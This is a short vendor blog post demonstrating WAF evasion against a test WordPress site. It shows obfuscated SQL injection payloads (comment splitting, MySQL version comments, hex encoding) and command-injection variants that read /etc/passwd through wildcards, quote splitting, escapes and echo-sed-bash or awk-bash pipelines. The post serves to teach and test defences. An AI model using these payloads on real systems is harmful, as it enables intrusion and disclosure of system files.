WAF bypass techniques

Nemesida WAF
3 min readAug 13, 2019

--

The information is for introduction only. Do not break the law.

Web Application Firewall is a popular tool to counter web application attacks. In this article I will show some of WAF bypass techniques.

WAF bypass: SQL injection

Before the demonstration I set up web application based on CMS WordPress and installed plagin contains vulnerability in cookie parameter. Now let’s try to exploit it using payload:

[“1807192982')) union select 1,2,3,4,5,6,7,8,9,0,11#”].

The payload was blocked by WAF, but we will try to bypass it:

[“1807192982')) union se”,”lect 1,2,3,4,5,6,7,8,9,0,11#”].

In this example we split operators union and select with characters “,”.

This method allows to bypass WAF and on the web application side the request will be gathered and will be processed like union select:

[“1807192982')) union/**/select/**/1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/’pentestit’,/**/11#”]

When changing of all blank characters on the comment, WAF will be able to detect an attack. Words union or select can be used in legitimate requests, but the operators chord can be used for making an attack. As the simplest signature it is possible to use union\s+select, that will lead to reduce false positives:

[“1807192982')) union(select(1),2,3,4,5,6,7,8,9,0x70656e746573746974,11)#”]

One more way is using block commenting for select operator, which is typically for MySQL:

[“1807192982')) /*!u%6eion*/ /*!se%6cect*/ (1),(2),(3),(4),(5),(6),(7),(8),(9.),(0x70656e746573746974),(11)#”]

Also it is possible to use some characters changing on their hexadecimal code:

[“1807192982')) %2f**%2funion%2f**%2fselect (1),(2),(3),(4),(5),(6),(7),(8),(9),(0x70656e746573746974),(11)#”]

This way looks like the previous one, but here the «slash» is changed on the hexadecimal code.

WAF bypass: RCE

Let’s examine WAF bypass ways during the exploitation RCE vulnerability on the previously made page without fields filtering from the web page side. For example we want to process the request http://site.test.lan/test.php?search=cat /etc/passwd. In this form it will be blocked by WAF signatures.

Server’s answer:

Let’s try to change the request:

cat /etc/pa?swd
cat /etc/pa’ss’wd
cat /etc/pa**wd

Server’s answer:

Changing one request which is blocked by WAF signatures with different ways, we can get an expression, which will not be detected as an attack by WAF. In this case using signatures in request the key word password search processes. The key word splitting in the request will not allow to WAF detect a signature:

ec’h’o ‘cat /etc/examplewd’ | sed ‘s/example/pass/g’ | bash

This way consistently processes the command: echo cat /etc/examplewd and using function sed the necessary line area is changed using a template cat /etc/examplewd. After that the changed line is transmitted into bash and processes on the server, back the result to the user. The request will look like a line in which there are not signature features for WAF, but on the server’s side the request will process like command bash and will back the result of that command in web application:

e’c’ho ‘swd test pentest’ |awk ‘{print “cat /etc/pas”$1}’ |bash

The method looks like the previous one using function awk:

c\a\t \/\e\t\c/\p\a\s\sw\d

It is possible to escape characters in bash using \. Use this possibility to create a request.

Thus, the attack detection using signatures is not reliable web application protection method. The understanding of signature creating principle and using WAF with machine learning will help with protection system bypass methods.

P.S.: If you use WAF you have to ensure that it blocks examined their modification examples.

--

--

Nemesida WAF
Nemesida WAF

Written by Nemesida WAF

A modern on-prem application security platform that protects all forms web traffic, services and APIs. Powered by Nemesida AI.

No responses yet